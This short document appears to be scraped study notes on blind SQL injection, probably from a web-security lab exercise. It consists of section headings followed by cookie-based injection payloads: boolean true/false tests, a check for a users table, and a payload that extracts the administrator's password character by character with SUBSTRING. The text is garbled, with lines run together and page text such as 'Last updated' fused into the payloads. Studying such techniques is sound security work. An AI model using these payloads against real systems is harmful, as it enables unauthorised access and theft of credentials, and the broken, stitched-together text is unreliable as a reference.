Blind SQL injection
Condition
Boolean Based Attack
TIME BASED ATTACK
Cons
Boolean Based Attack Example :
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4Last updated
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4Last updated
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='1 # Will return True
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='2 # Will return FalseTrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT 'a' FROM users LIMIT 1)='aTrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username='administrator')='§a§